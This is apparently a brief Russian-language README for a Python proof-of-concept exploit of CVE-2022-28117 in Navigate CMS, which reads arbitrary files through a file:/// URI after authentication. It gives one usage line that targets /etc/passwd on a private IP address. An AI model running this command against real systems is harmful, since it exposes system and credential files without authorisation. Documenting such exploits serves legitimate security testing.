
Эксплойт Proof-of-concept для CVE-2022-28117, позволяющий произвольное чтение файлов через схему URI file:/// в Navigate CMS, с поддержкой аутентификации.
PoC python с небольшими изменениями
Использование: python3 .\poccve2022-28117.py -x file:///etc/passwd -u [username] -p [password] http://192.168.148.140/navigate